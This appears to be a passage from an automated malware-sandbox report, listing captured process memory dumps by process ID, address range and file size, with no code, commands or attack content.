memory/1100-805-0x0000017A45CD0000-0x0000017A45CF7000-memory.dmpFilesize
156KB
-
memory/1164-806-0x000001120C6F0000-0x000001120C717000-memory.dmpFilesize
156KB
-
memory/1196-819-0x0000027CB8590000-0x0000027CB85B7000-memory.dmpFilesize
156KB
-
memory/1204-298-0x0000000002620000-0x0000000002B26000-memory.dmpFilesize
5.0MB
-
memory/1204-304-0x000000000D2C0000-0x000000000D338000-memory.dmpFilesize
480KB
-
memory/1204-248-0x0000000002620000-0x0000000002B26000-memory.dmpFilesize
5.0MB
-
memory/1204-269-0x0000000002320000-0x0000000002423000-memory.dmpFilesize
1.0MB
-
memory/1204-198-0x0000000000000000-mapping.dmp
-
memory/1204-270-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/1204-311-0x000000000D2C0000-0x000000000D338000-memory.dmpFilesize
480KB
-
memory/1204-299-0x0000000002320000-0x0000000002423000-memory.dmpFilesize
1.0MB
-
memory/1204-300-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/1212-818-0x000001E285640000-0x000001E285667000-memory.dmpFilesize
156KB
-
memory/1264-815-0x000001FDCB2C0000-0x000001FDCB2E7000-memory.dmpFilesize
156KB
-
memory/1328-813-0x000002AF40290000-0x000002AF402B7000-memory.dmpFilesize
156KB
-
memory/1352-653-0x0000000000000000-mapping.dmp
-
memory/1396-822-0x0000023BBED90000-0x0000023BBEDB7000-memory.dmpFilesize
156KB
-
memory/1452-823-0x0000019DB1BF0000-0x0000019DB1C17000-memory.dmpFilesize
156KB
-
memory/1460-338-0x0000000000000000-mapping.dmp
-
memory/1480-824-0x0000019FAA6B0000-0x0000019FAA6D7000-memory.dmpFilesize
156KB
-
memory/1488-825-0x00000166853C0000-0x00000166853E7000-memory.dmpFilesize
156KB
-
memory/1544-816-0x0000000000000000-mapping.dmp
-
memory/1552-826-0x00000195B97A0000-0x00000195B97C7000-memory.dmpFilesize
156KB
-
memory/1596-827-0x000001C36C130000-0x000001C36C157000-memory.dmpFilesize
156KB
-
memory/1656-828-0x000001B7EEA80000-0x000001B7EEAA7000-memory.dmpFilesize
156KB
-
memory/1664-801-0x00007FFC09420000-0x00007FFC094CE000-memory.dmpFilesize
696KB
-
memory/1664-800-0x00007FFC0A7F0000-0x00007FFC0A9CB000-memory.dmpFilesize
1.9MB
-
memory/1664-741-0x0000000140002314-mapping.dmp
-
memory/1664-798-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1780-829-0x0000024FBB690000-0x0000024FBB6B7000-memory.dmpFilesize
156KB
-
memory/1792-333-0x0000000000000000-mapping.dmp
-
memory/1828-830-0x0000018ADD600000-0x0000018ADD627000-memory.dmpFilesize
156KB
-
memory/1840-831-0x000002325D600000-0x000002325D627000-memory.dmpFilesize
156KB
-
memory/1860-327-0x0000000000000000-mapping.dmp
-
memory/1896-832-0x00000141DBEC0000-0x00000141DBEE7000-memory.dmpFilesize
156KB
-
memory/1920-835-0x0000017E31090000-0x0000017E310B7000-memory.dmpFilesize
156KB
-
memory/2160-320-0x0000000000000000-mapping.dmp
-
memory/2172-160-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-159-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-182-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-183-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-184-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-121-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-122-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-123-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-124-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-180-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-179-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-125-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-210-0x0000000003130000-0x00000000032BE000-memory.dmpFilesize
1.6MB
-
memory/2172-211-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-178-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-126-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-177-0x0000000003130000-0x0000000003632000-memory.dmpFilesize
5.0MB
-
memory/2172-127-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-176-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-175-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-174-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-173-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-172-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-169-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-170-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-171-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-168-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-128-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-167-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-129-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-166-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-130-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-131-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-132-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-133-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-165-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-163-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-164-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-134-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-162-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-135-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-136-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-120-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-137-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-138-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-139-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-140-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-141-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-142-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-143-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-161-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-144-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-181-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-145-0x0000000003130000-0x0000000003632000-memory.dmpFilesize
5.0MB
-
memory/2172-157-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-158-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-146-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-147-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-148-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-149-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-150-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-151-0x0000000002F90000-0x0000000003098000-memory.dmpFilesize
1.0MB
-
memory/2172-152-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-156-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-153-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-155-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2172-154-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/2372-329-0x0000000000000000-mapping.dmp
-
memory/2384-332-0x0000000000000000-mapping.dmp
-
memory/2644-331-0x0000000000000000-mapping.dmp
-
memory/2692-345-0x0000000000000000-mapping.dmp
-
memory/3016-204-0x0000000000000000-mapping.dmp
-
memory/3024-821-0x0000000002550000-0x0000000002577000-memory.dmpFilesize
156KB
-
memory/3088-611-0x0000000140000000-0x0000000141190000-memory.dmpFilesize
17.6MB
-
memory/3088-319-0x0000000140000000-0x0000000141190000-memory.dmpFilesize
17.6MB
-
memory/3132-325-0x0000000000000000-mapping.dmp
-
memory/3276-185-0x0000000000000000-mapping.dmp
-
memory/3276-187-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/3276-186-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/3276-188-0x00000000779B0000-0x0000000077B3E000-memory.dmpFilesize
1.6MB
-
memory/3504-330-0x0000000000000000-mapping.dmp
-
memory/3816-342-0x0000000000000000-mapping.dmp
-
memory/3960-250-0x0000000000000000-mapping.dmp
-
memory/4312-820-0x000001A4D3400000-0x000001A4D3427000-memory.dmpFilesize
156KB
-
memory/4388-749-0x00007FFC0A7F0000-0x00007FFC0A9CB000-memory.dmpFilesize
1.9MB
-
memory/4388-736-0x00000173DF5C0000-0x00000173DF5E6000-memory.dmpFilesize
152KB
-
memory/4388-787-0x00007FFC09420000-0x00007FFC094CE000-memory.dmpFilesize
696KB
-
memory/4420-606-0x00007FF69C001938-mapping.dmp
-
memory/4460-812-0x0000000000000000-mapping.dmp
-
memory/4504-328-0x00000132AAA50000-0x00000132AAA72000-memory.dmpFilesize
136KB
-
memory/4504-357-0x00000132AABE0000-0x00000132AABFC000-memory.dmpFilesize
112KB
-
memory/4504-363-0x00000132AB0B0000-0x00000132AB169000-memory.dmpFilesize
740KB
-
memory/4504-392-0x00000132AB170000-0x00000132AB17A000-memory.dmpFilesize
40KB
-
memory/4504-571-0x00000132AB1A0000-0x00000132AB1BC000-memory.dmpFilesize
112KB
-
memory/4504-605-0x00000132A8A49000-0x00000132A8A4F000-memory.dmpFilesize
24KB
-
memory/4504-339-0x00000132AAC00000-0x00000132AAC76000-memory.dmpFilesize
472KB
-
memory/4808-241-0x0000000000000000-mapping.dmp
-
memory/4904-620-0x0000000000000000-mapping.dmp
-
memory/4988-676-0x0000000003590000-0x00000000035C6000-memory.dmpFilesize
216KB
-
memory/4988-682-0x0000000006330000-0x0000000006958000-memory.dmpFilesize
6.2MB
-
memory/4988-704-0x0000000005F20000-0x0000000005F42000-memory.dmpFilesize
136KB
-
memory/4988-711-0x00000000062A0000-0x0000000006306000-memory.dmpFilesize
408KB
-
memory/4988-712-0x0000000006960000-0x00000000069C6000-memory.dmpFilesize
408KB
-
memory/4988-734-0x00000000069D0000-0x0000000006D20000-memory.dmpFilesize
3.3MB